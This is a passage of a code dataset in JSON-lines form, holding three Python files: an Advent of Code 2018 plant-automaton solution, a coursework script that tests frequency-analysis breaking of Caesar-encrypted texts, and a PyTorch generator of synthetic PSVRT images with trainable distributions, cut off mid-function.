get_data():\n return input_lines(DAY, YEAR)\n\n\ndata = get_data()\n\ninitial_state = data[0].split()[2]\ninitial_state = {x: initial_state[x] for x in range(len(initial_state))}\nstate = initial_state\nrules = [x.split() for x in data[2:]]\nrules = {x[0]: x[2] for x in rules}\n\ndef calc_score(current):\n score = 0\n for x in current:\n if current[x] == '#':\n score += x\n return score\n\ndef step(current):\n min_ = None\n max_ = None\n next_step = {}\n for x in current:\n if current[x] == '#':\n if min_ is None:\n min_ = max_ = x\n else:\n min_ = min(min_, x)\n max_ = max(max_, x)\n for i in range(min_ - 2, max_ + 3):\n r = [current.get(i + x, \".\") for x in range(-2, 3)]\n r = \"\".join(r)\n n = rules[r]\n next_step[i] = n\n return next_step\n\n\ndef to_string(current):\n min_ = None\n max_ = None\n for x in current:\n if current[x] == '#':\n if min_ is None:\n min_ = max_ = x\n else:\n min_ = min(min_, x)\n max_ = max(max_, x)\n return \"\".join(current[i] for i in range(min_, max_ + 1))\n\n\nfor i in range(20):\n state = step(state)\nfirst = calc_score(state)\n\nstate = initial_state\nt = 0\nexisted = {to_string(state): (calc_score(state), t)}\nwhile True:\n state = step(state)\n state_str = to_string(state)\n t += 1\n if state_str in existed:\n break\n else:\n existed[state_str] = (calc_score(state), t)\n\nscore, time = existed[state_str]\nscore_diff = calc_score(state) - score\nperiod = t - time\n# For my input the period was 1 so this works, if the period is not 1 more maths is needed\ngenerations = 50000000000\nsecond = (generations - time) * score_diff + score\n\nprint(f\"First: {first}\")\nprint(f\"Second: {second}\")\n","repo_name":"ChocolateChipKookie/AoC","sub_path":"AoC2018/solutions/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36327056587","text":"# -*- coding:utf-8 -*-\r\n'''\r\n本题提供文本加密、字母频率统计以及频率分析法破解精度计算的Python3程序,请使用该程序进行以下分析:\r\n\r\n(1)分析不同错误容忍度(程序中tolerance超参数)对破解精度的影响。\r\n\r\n(2)分析不同的加密文本长度对破解精度的影响\r\n\r\n(3)分析不同类型的文本(学术、小说、新闻…)对破解精度的影响\r\n\r\n(4)分析同一类型中不同主题的文本(如新闻文本包含科技、政治、体育等不同主题)对破解精度的影响。\r\n\r\n需要提交:\r\n\r\n(1)程序文档,文档结构包括:问题描述、主要算法或者模型、实验数据及分析、有关说明(如引用他人程序说明);\r\n\r\n(2)程序源代码,其中需要包含注释,以及程序运行环境的说明;\r\n\r\n(3)提交方式:将有关文件打包成 xxP1.zip, 其中xx为学号,并上传到pintia.cn中。\r\n'''\r\nimport os\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom Caesar_Cipher import Caesar\r\n\r\n# Read files\r\ntextfiles = os.listdir(os.path.join('.','text'))\r\n# Delete saved files, if any\r\n_ = [os.remove(os.path.join('.','text',file)) for file in textfiles if 'part' in file.split('`')]\r\n_ = [os.remove(os.path.join('.','text',file)) for file in textfiles if 'encrypt' in file.split('`')]\r\n# Keep `.txt` files only\r\ntextfiles = [os.path.join('.','text',file) for file in textfiles\r\n if file.endswith('txt') and not 'encrypt' in file.split('`') and not 'part' in file.split('`')]\r\n# Classify files\r\nfiletypes = {}\r\ntypes = [file.split('`')[1] for file in textfiles]\r\nfor t in types:\r\n if not t in filetypes:\r\n filetypes[t] = [file for file in textfiles if t in file.split('`')]\r\n\r\n# Back up `Caesar`\r\nCAESAR = []\r\n\r\n# Choose a random `offset`\r\nOFFSET = np.random.randint(26)\r\n# Maximum value for tolerance\r\nTOLERANCE = 12\r\n\r\n# Accuracy(TOLERANCE,len(filetypes))\r\nACC = np.zeros((TOLERANCE,len(filetypes)),dtype='float64')\r\n# Accuracy of each type of text under each tolerance\r\nacc = [0 for _ in range(len(textfiles))]\r\n\r\nfor tol in range(TOLERANCE):\r\n for itypes, types in enumerate(filetypes):\r\n for itext, text in enumerate(filetypes[types]):\r\n\r\n C = Caesar(offset=OFFSET,tolerance=tol)\r\n CAESAR.append(C)\r\n\r\n # read, encrypt and save file\r\n C.read_file(text)\r\n C.encrypt()\r\n #C.save_to_file(os.path.join('.','text','`encrypt`'+' '+str(step).zfill(2)+'-'+str(STEPS)+text.split('`')[-1]))\r\n\r\n # use letter frency method to decrypt text and calculate accuracy\r\n letter_count = C.get_letter_count()\r\n en_letter_frequency = C.get_letter_frequency()\r\n accuracy, offset = C.get_accuracy(en_letter_frequency)\r\n\r\n # save results\r\n acc[itext] = accuracy*100\r\n ACC[tol][itypes] = sum(acc)/len([a for a in acc if not a == 0])\r\n acc = [0 for _ in range(len(textfiles))]\r\n print('Loading...{:6.2f}%'.format(100*(tol*len(filetypes)+itypes)/(len(filetypes)*TOLERANCE)))\r\n\r\n# Plot result\r\nfig = plt.figure(figsize=(8,6))\r\nax = fig.add_subplot(1,1,1,projection='3d')\r\nX = np.arange(len(filetypes))\r\nY = np.arange(TOLERANCE)\r\nZ = ACC\r\nplt.xticks(range(len([item for item in filetypes])), [item for item in filetypes])\r\nX, Y = np.meshgrid(X, Y)\r\nX, Y, Z = X.ravel(), Y.ravel(), Z.ravel()\r\nheight = np.zeros_like(Z)\r\nwidth = 0.3\r\ndepth = 0.8\r\nc = [[1-(z-min(Z))/(max(Z)-min(Z)), (z-min(Z))/(max(Z)-min(Z)), (z-min(Z))/(max(Z)-min(Z))/2] for z in Z]\r\nax.bar3d(X, Y, height, width, depth, Z, color=c)\r\nax.view_init(21, -125)\r\nax.set_title('Accuracy V.S. Types')\r\nax.set_xlabel('types')\r\nax.set_ylabel('tolerance')\r\nax.set_zlabel('accuracy/%')\r\n#plt.show()\r\nplt.savefig('Accuracy V.S. Types.jpg')\r\nplt.close()\r\n","repo_name":"SDaydreamer/course-work-Caesar-cipher","sub_path":"main-types.py","file_name":"main-types.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42609807322","text":"import math\nimport torch\nfrom torch import nn\n# import torch.nn.functional as F\nfrom utils import gumbel_softmax, sample_gumbel\nfrom torch.distributions.relaxed_categorical import RelaxedOneHotCategorical\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nfrom torch.distributions.normal import Normal\nfrom torch.distributions.half_normal import HalfNormal\nfrom torch.distributions.relaxed_bernoulli import RelaxedBernoulli\nfrom resources.constrained_normal import Normal as CNormal\n# from torch.distributions.constraint_registry import transform_to\n# from torch.distributions import transforms\n# from torch.distributions import transform_to\n# from torch.distributions import constraints\nimport utils\n\n\n# Fixed dataset params\nCATEGORICAL = False\nMAX_OBJECTS = 10\nMAX_OBJECT_SIZE = 10\nMIN_OBJECTS = 2\nMIN_OBJECT_SIZE = 1\nMIN_DYNAMIC_RANGE = 2\nOBJECT_MARGIN = 7\n# NORM_MEAN = torch.tensor([0., 0., 0.]).float()\n# NORM_STD = torch.tensor([1., 1., 1.]).float()\nNORM_MEAN = torch.tensor([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)\nNORM_STD = torch.tensor([0.229, 0.224, 0.225]).reshape(1, 3, 1, 1)\nGRID_RES = 10 # Default is 10x10 possible positions for objects\n\n# Initialize dataset lambdas\nSPATIAL_SCALE = torch.tensor(2).float()\nMINIMUM_SPATIAL_SCALE = torch.tensor(2.).float()\nDYNAMIC_RANGE_SCALE = torch.tensor(1.).float() # Relaxed bernoulli\n\n# Use categorical\nif CATEGORICAL:\n OBJECT_NUMBER_LOC = torch.zeros(MIN_OBJECTS).float() + .1 / MIN_OBJECTS\n OBJECT_NUMBER_LOC[0] = 1. - OBJECT_NUMBER_LOC.sum() + OBJECT_NUMBER_LOC[0] # noqa\n OBJECT_SIZE_LOC = torch.zeros(MAX_OBJECT_SIZE).float() + .1 / MAX_OBJECT_SIZE # noqa\n OBJECT_SIZE_LOC[0] = 1. - OBJECT_SIZE_LOC.sum() + OBJECT_SIZE_LOC[0]\n OBJECT_NUMBER_SCALE = torch.zeros([])\n OBJECT_SIZE_SCALE = torch.zeros([])\nelse:\n # Use gaussian\n OBJECT_NUMBER_LOC = torch.tensor(2.).float() # TODO: Set to 0\n OBJECT_SIZE_LOC = torch.tensor(1.).float() # TODO: Set to 0\n OBJECT_NUMBER_SCALE = torch.tensor(0.75).float()\n OBJECT_SIZE_SCALE = torch.tensor(0.75).float()\n\n\nclass Generator(nn.Module):\n def __init__(\n self,\n dataset,\n img_size,\n device,\n num_classes=2,\n task='sd',\n siamese=False,\n wn=False,\n batch_grad=False,\n one_object_size_per_batch=False,\n embedding_grad=False,\n gumbel_type='dist',\n categorical=CATEGORICAL,\n norm_mean=NORM_MEAN,\n norm_std=NORM_STD,\n spatial_scale=SPATIAL_SCALE,\n minimum_spatial_scale=MINIMUM_SPATIAL_SCALE,\n object_number_loc=OBJECT_NUMBER_LOC,\n object_number_scale=OBJECT_NUMBER_SCALE,\n object_size_loc=OBJECT_SIZE_LOC,\n object_size_scale=OBJECT_SIZE_SCALE,\n dynamic_range_scale=DYNAMIC_RANGE_SCALE,\n min_objects=MIN_OBJECTS,\n min_object_size=MIN_OBJECT_SIZE,\n min_dynamic_range=MIN_DYNAMIC_RANGE,\n object_margin=OBJECT_MARGIN,\n grid_res=GRID_RES,\n max_object_size=MAX_OBJECT_SIZE,\n max_objects=MAX_OBJECTS):\n \"\"\"Differentiable PSVRT generator.\n So far, generative model assumes that images are governed\n by four independent random variables:\n 1. Object location: bivarate gaussian\n 2. Object number: categorical\n 3. Object size:\n 4. Dynamic range: \"\"\"\n super(Generator, self).__init__()\n self.dataset = dataset\n self.img_size = img_size\n self.num_classes = num_classes\n self.min_objects = min_objects # Target # of same objs\n self.max_objects = max_objects\n self.device = device\n self.batch_grad = batch_grad\n self.minimum_spatial_scale = minimum_spatial_scale\n self.siamese = siamese\n self.object_margin = object_margin # Min distance btwn objs\n self.min_dynamic_range = min_dynamic_range\n self.one_object_size_per_batch = one_object_size_per_batch\n self.min_object_size = min_object_size\n self.max_object_size = max_object_size\n self.task = task.lower()\n self.wn = wn\n self.grid_res = grid_res\n self.embedding_grad = embedding_grad\n self.norm_mean = norm_mean.to(self.device)\n self.norm_std = norm_std.to(self.device)\n if self.siamese:\n self.reshape = (1, 3, 1, 1, 1)\n self.norm_mean = self.norm_mean.reshape(self.reshape)\n self.norm_std = self.norm_std.reshape(self.reshape)\n else:\n self.reshape = (1, 3, 1, 1)\n\n # Specify the distributions\n self.dists = []\n if CATEGORICAL:\n self.dists += [{\n 'name': 'num_objects',\n 'family': 'categorical',\n 'lambda_0': object_number_loc,\n 'lambda_0_scale': object_number_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n self.dists += [{\n 'name': 'object_size',\n 'family': 'categorical',\n 'lambda_0': object_size_loc,\n 'lambda_0_scale': object_size_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n else:\n self.dists += [{\n 'name': 'num_objects',\n # 'family': 'relaxed_bernoulli',\n 'family': 'normal',\n # 'family': 'categorical',\n 'lambda_0': object_number_loc,\n 'lambda_0_scale': object_number_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n self.dists += [{\n 'name': 'object_size',\n 'family': 'normal',\n # 'family': 'categorical',\n 'lambda_0': object_size_loc,\n 'lambda_0_scale': object_size_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n self.dists += [{\n 'name': 'dynamic_range',\n 'family': 'normal',\n 'lambda_0': 0.,\n 'lambda_0_scale': dynamic_range_scale,\n 'return_sampler': True,\n 'trainable': False,\n }]\n self.dists += [{\n 'name': 'object_location',\n 'trainable': True,\n # 'family': 'gaussian',\n 'family': 'half_normal',\n 'return_sampler': True,\n 'lambda_0': 0., # [float(self.img_size / 2.), float(self.img_size / 2.)],\n 'lambda_0_scale': spatial_scale\n }]\n if gumbel_type == 'dist':\n self.gumbel_fun = self.gumbel_softmax_dist\n else:\n self.gumbel_fun = gumbel_softmax\n self.check_dists()\n self.init_challenge()\n\n def check_dists(self):\n \"\"\"Simple parameter checking for dists.\"\"\"\n for di in self.dists:\n keys = list(di.keys())\n assert 'name' in keys, 'Need a name for your dist.'\n assert 'trainable' in keys, 'Need a trainable for your dist.'\n assert 'family' in keys, 'Need a family for your dist.'\n assert 'lambda_0' in keys, 'Need a lambda_0 for your dist.'\n assert 'return_sampler' in keys, 'Need a return_sampler for your dist.' # noqa\n\n def _test(self):\n \"\"\"Add a test here.\"\"\"\n return\n\n def normalize_weights(self, name, prop):\n \"\"\"Apply weight normalization.\"\"\"\n g_attr_name = '{}_{}'.format(name, '{}_g'.format(prop))\n v_attr_name = '{}_{}'.format(name, '{}_v'.format(prop))\n g = getattr(self, g_attr_name)\n v = getattr(self, v_attr_name)\n return v * (g / torch.norm(v)).expand_as(v)\n\n def init_wns(self, w):\n \"\"\"Initialize weight normed weights.\"\"\"\n g = torch.norm(w)\n v = w / g.expand_as(w)\n return g, v\n\n def st_op(self, y):\n \"\"\"Apply ST operator.\"\"\"\n shape = y.size()\n _, ind = y.max(dim=-1)\n # y_hard = torch.zeros_like(y).scatter_(-1, ind, 1.0)\n ind = ind.unsqueeze(-1)\n y_hard = torch.zeros_like(y).scatter_(-1, ind, 1.0)\n y_hard = y_hard.view(*shape)\n y = (y_hard - y).detach() + y\n return y\n\n def gumbel_softmax_dist(\n self,\n param,\n name,\n temperature=1e-1,\n hard=True,\n sample_size=()):\n \"\"\"ST gumbel with pytorch distributions.\"\"\"\n gumbel = RelaxedOneHotCategorical(temperature, logits=param)\n y = gumbel.rsample(sample_size)\n if hard:\n # One-hot the y\n y = self.st_op(y)\n return y\n\n def init_challenge(self, mu=1e-4, sigma=1e-4, pi=1e-4, eps=1e-4):\n \"\"\"Initialize the perturbation vector r.\n We want to learn r, which perturbs the fixed random parameters\n \\lambda_0. To do this, we will initialize r as \\lambda_0, and\n use a generative loss to ensure r is minimally different than\n \\lambda_0.\n\n Initialization is lambda_0 + alpha * distribution_noise.\n \"\"\"\n for idx, row in enumerate(self.dists):\n trainable = row['trainable']\n # We have lambda_0 (for center/maybe scale)\n if not torch.is_tensor(row['lambda_0']):\n # If this is not a torch tensor, convert it\n row['lambda_0'] = torch.tensor(row['lambda_0'])\n\n # Send lambda_0 center to device\n row['lambda_0'] = row['lambda_0'].to(self.device)\n if (\n row['family'] == 'gaussian' or\n row['family'] == 'normal' or\n row['family'] == 'cnormal' or\n row['family'] == 'abs_normal'):\n if not torch.is_tensor(row['lambda_0_scale']):\n # If this is not a torch tensor, convert it\n row['lambda_0_scale'] = torch.is_tensor(row['lambda_0_scale']) # noqa\n # Send lambda_0 scale to device\n self.dists[idx]['lambda_0_scale'] = row['lambda_0_scale'].to(self.device) # noqa\n\n # Initilize challenge center/scale\n lambda_r = row['lambda_0'] + torch.randn_like(row['lambda_0']) * mu # noqa\n lambda_r_scale = row['lambda_0_scale'] + torch.randn_like(row['lambda_0_scale']) * sigma # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(lambda_r_scale) # noqa\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale, requires_grad=trainable)) # noqa\n elif row['family'] == 'half_normal':\n if not torch.is_tensor(row['lambda_0_scale']):\n # If this is not a torch tensor, convert it\n row['lambda_0_scale'] = torch.is_tensor(row['lambda_0_scale']) # noqa\n # Send lambda_0 scale to device\n self.dists[idx]['lambda_0_scale'] = row['lambda_0_scale'].to(self.device) # noqa\n\n # Initilize challenge center/scale\n lambda_r_scale = row['lambda_0_scale'] + torch.abs(torch.randn_like(row['lambda_0_scale'])) * sigma # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'scale_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'scale')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale, requires_grad=trainable)) # noqa\n elif row['family'] == 'relaxed_bernoulli':\n # Handle pi of categorical dist (var/temp is hardcoded)\n soft_log_probs = torch.log(row['lambda_0'] + eps) # Don't save\n lambda_r = soft_log_probs # + torch.rand_like(soft_log_probs) * pi # noqa\n lambda_r = lambda_r.to(self.device) # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n elif row['family'] == 'categorical':\n # Handle pi of categorical dist (var/temp is hardcoded)\n soft_log_probs = torch.log(row['lambda_0'] + eps) # Don't save\n lambda_r = soft_log_probs + sample_gumbel(soft_log_probs) * pi # noqa\n lambda_r = lambda_r.to(self.device) # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n else:\n raise NotImplementedError\n\n def rejection_sampling(\n self,\n object_margin,\n margin_offset,\n object_locations,\n max_rejections,\n num_objects,\n gau):\n \"\"\"Select samples with rejection sampling.\"\"\"\n assert object_locations is not None, \\\n 'Needs a list of previous object locations.'\n assert object_margin is not None, \\\n 'No sampling margin provided.'\n # Adjust coordinates so objects don't overlap\n working = True\n margin = object_margin + margin_offset # noqa\n count = 0\n while working:\n sample = gau.rsample()\n if num_objects == 0:\n return sample\n ds = torch.abs( # cityblock distance\n sample - torch.stack(object_locations, 0)).sum(-1)\n working = torch.any(ds < margin)\n count += 1\n if count > max_rejections:\n raise RuntimeError('Failed to sample images.')\n return sample\n\n def sample_lambda0_r(\n self,\n d,\n batch_size,\n offset=0,\n object_locations=None,\n object_margin=None,\n num_objects=None,\n gau=None,\n max_rejections=1000,\n margin_offset=2):\n \"\"\"Sample dataset parameters perturbed by r.\"\"\"\n name = d['name']\n family = d['family']\n attr_name = '{}_{}'.format(name, 'center')\n if self.wn:\n lambda_r = self.normalize_weights(name=name, prop='center')\n elif family != 'half_normal':\n lambda_r = getattr(self, attr_name)\n parameters = []\n if family == 'gaussian':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n # lambda_r = transform_to(constraints.greater_than(\n # 1.))(lambda_r)\n # lambda_r_scale = transform_to(constraints.greater_than(\n # self.minimum_spatial_scale))(lambda_r_scale)\n # TODO: Add constraint function here\n # w=module.weight.data\n # w=w.clamp(0.5,0.7)\n # module.weight.data=w\n\n if gau is None:\n gau = MultivariateNormal(\n loc=lambda_r,\n covariance_matrix=lambda_r_scale)\n if d['return_sampler']:\n return gau\n if name == 'object_location':\n if not len(object_locations):\n return gau.rsample(), gau\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=gau)\n else:\n raise NotImplementedError(name)\n elif family == 'normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n nor = Normal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n elif name == 'object_location':\n # nor.arg_constraints['scale'] = constraints.greater_than(self.minimum_spatial_scale) # noqa\n if not len(object_locations):\n return nor.rsample(), nor\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=nor)\n else:\n for idx in range(batch_size):\n parameters.append(nor.rsample())\n elif family == 'cnormal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n\n # Explicitly clamp the scale!\n lambda_r_scale = torch.clamp(lambda_r_scale, self.minimum_spatial_scale, 999.)\n nor = CNormal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n elif name == 'object_location':\n # nor.arg_constraints['scale'] = constraints.greater_than(self.minimum_spatial_scale) # noqa\n if not len(object_locations):\n return nor.rsample(), nor\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=nor)\n else:\n for idx in range(batch_size):\n parameters.append(nor.rsample())\n elif family == 'abs_normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n # lambda_r = transform_to(Normal.arg_constraints['loc'])(lambda_r)\n # lambda_r_scale = transform_to(Normal.arg_constraints['scale'])(lambda_r_scale) # noqa\n # lambda_r = transforms.AbsTransform()(lambda_r)\n # lambda_r_scale = transforms.AbsTransform()(lambda_r_scale)\n # These kill grads!! # lambda_r = torch.abs(lambda_r)\n # These kill grads!! lambda_r_scale = torch.abs(lambda_r_scale)\n nor = Normal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n else:\n parameters = nor.rsample([batch_size])\n elif family == 'half_normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n nor = HalfNormal(scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n else:\n parameters = nor.rsample([batch_size])\n elif family == 'categorical':\n if d['return_sampler']:\n gum = RelaxedOneHotCategorical(1e-1, logits=lambda_r)\n return gum\n # return lambda sample_size: self.argmax(self.gumbel_fun(lambda_r, name=name)) + offset # noqa\n for _ in range(batch_size):\n parameters.append(self.argmax(self.gumbel_fun(lambda_r, name=name)) + offset) # noqa Use default temperature -> max\n elif family == 'relaxed_bernoulli':\n bern = RelaxedBernoulli(temperature=1e-1, logits=lambda_r)\n if d['return_sampler']:\n return bern\n else:\n parameters = bern.rsample([batch_size])\n else:\n raise NotImplementedError(\n '{} not implemented in sampling.'.format(family))\n return parameters\n\n def argmax(self, one_hot):\n \"\"\"Differentiable argmax trick.\"\"\"\n oh_shape = one_hot.shape\n if len(oh_shape) == 2:\n inds = torch.arange(\n 1,\n oh_shape[1] + 1,\n dtype=one_hot.dtype,\n requires_grad=True).reshape(1, -1).to(self.device)\n return (inds.repeat(oh_shape[0], 1) * one_hot).max(-1)[0] - 1\n elif len(oh_shape) == 3:\n inds = torch.arange(\n 1,\n oh_shape[1] + 1,\n dtype=one_hot.dtype,\n requires_grad=True).reshape(1, 1, -1).to(self.device)\n return (inds.repeat(\n oh_shape[0], inds.shape[-1], 1) * one_hot).max(-1)[0] - 1\n elif len(oh_shape) == 1:\n return (torch.arange(1, oh_shape[0] + 1, dtype=one_hot.dtype, requires_grad=True).to(self.device) * one_hot).max()[0] - 1 # noqa\n else:\n raise NotImplementedError(len(oh_shape))\n\n def set_trainable(self):\n \"\"\"Set the data generator to train appropriate variables.\"\"\"\n self.batch_grad = True\n\n def set_not_trainable(self):\n \"\"\"Set the data generator to train appropriate variables.\"\"\"\n self.batch_grad = False\n\n def sample_batch(\n self,\n batch_size,\n target_rng=255.):\n \"\"\"\n Sample a batch.\n\n batch_size: (int) size of batch\n\n Returns\n\n batch: (tensor)\n labels: (tensor)\n params: (dict) the sampled parameters for images in this batch\n\n Hold object properties constant for now across +/- samples. Fix later.\n \"\"\"\n if not torch.is_tensor(target_rng):\n target_rng = torch.tensor(target_rng).float()\n if self.siamese:\n image_batch = torch.zeros((\n batch_size,\n self.img_size,\n self.img_size,\n 2), requires_grad=self.batch_grad)\n else:\n image_batch = torch.zeros((\n batch_size,\n self.img_size,\n self.img_size), requires_grad=self.batch_grad)\n image_batch = image_batch.to(self.device)\n label_batch = torch.zeros(\n (batch_size, 1), dtype=torch.long, device=self.device)\n num_object_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[0])\n num_objects = num_object_ps.rsample([batch_size]).abs()\n if self.dists[0]['family'] == 'categorical':\n num_objects = self.st_op(num_objects)\n obj_cat = torch.arange(\n 1,\n num_objects.shape[-1] + 1,\n dtype=num_objects.dtype,\n requires_grad=True).to(self.device)\n obj_cat = obj_cat.reshape(1, -1, 1, 1)\n obj_cat = obj_cat.repeat(batch_size, 1, 1, 1)\n num_objects = (obj_cat * num_objects.reshape(\n batch_size, self.max_objects, 1, 1)).sum(1, keepdims=True)\n num_objects = torch.abs(\n torch.clamp(-(obj_cat - self.min_objects - num_objects), 0, 1))\n elif self.dists[0]['family'] == 'relaxed_bernoulli':\n num_objects = num_object_ps.rsample([batch_size])\n num_objects = self.st_op(num_objects)\n num_objects[:, :self.min_objects] = 1.\n elif (\n 'gaussian' in self.dists[0]['family'] or\n 'normal' in self.dists[0]['family']):\n num_objects = (\n num_objects.round() - num_objects).detach() + num_objects\n num_objects = torch.clamp(\n num_objects.reshape(-1, 1, 1, 1),\n self.min_objects,\n self.max_objects)\n obj_cat = torch.arange(\n 1,\n self.max_objects + 1,\n dtype=num_objects.dtype,\n requires_grad=True).to(self.device)\n obj_cat = obj_cat.reshape(1, -1, 1, 1)\n obj_cat = obj_cat.repeat(batch_size, 1, 1, 1)\n num_objects = torch.abs(torch.clamp(-(obj_cat - self.min_objects + 1 - num_objects), 0, 1)) # noqa\n else:\n raise NotImplementedError(self.dists[0]['family'])\n dynamic_range_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[2],\n offset=self.min_dynamic_range) # Dist object... used to have + 2\n dynamic_range = torch.tanh(\n dynamic_range_ps.rsample((\n batch_size, self.max_objects, self.img_size, self.img_size)))\n object_size_ps = self.sample_lambda0_r(\n batch_size=batch_size,\n d=self.dists[1],\n offset=1)\n if self.one_object_size_per_batch:\n object_sizes = object_size_ps.rsample([batch_size]).abs()\n if self.dists[1]['family'] == 'categorical':\n object_sizes = self.argmax(self.st_op(object_sizes))\n else:\n object_sizes = object_size_ps.rsample(\n [batch_size, self.max_objects]).abs()\n if self.dists[1]['family'] == 'categorical':\n object_sizes = self.st_op(object_sizes)\n object_sizes = self.argmax(object_sizes)\n elif (\n 'gaussian' in self.dists[1]['family'] or\n 'normal' in self.dists[1]['family']):\n object_sizes = (\n object_sizes.round() -\n object_sizes).detach() + object_sizes\n else:\n raise NotImplementedError(self.dists[1]['family'])\n object_sizes = object_sizes + self.min_object_size\n object_radiuses = torch.clamp(\n object_sizes, self.min_object_size, self.max_object_size)\n y_range = torch.arange(0, self.img_size).to(self.device) # v1\n x_range = torch.arange(0, self.img_size).to(self.device) # v1\n yys, xxs = torch.meshgrid(y_range, x_range) # v1\n yys = yys.unsqueeze(0).repeat(self.max_objects, 1, 1).float() # v1\n xxs = xxs.unsqueeze(0).repeat(self.max_objects, 1, 1).float() # v1\n gau = self.sample_lambda0_r(d=self.dists[3], batch_size=batch_size)\n\n # Object location grids -- See (1) below for explanation\n cyys, cxxs = torch.meshgrid(torch.arange(self.grid_res), torch.arange(self.grid_res))\n adj_ceil = self.img_size - self.max_object_size\n # y_offset = (self.img_size - cyys.max()) / 2\n # x_offset = (self.img_size - cxxs.max()) / 2\n # cyys = cyys + y_offset\n # cxxs = cxxs + x_offset\n loc_grid = 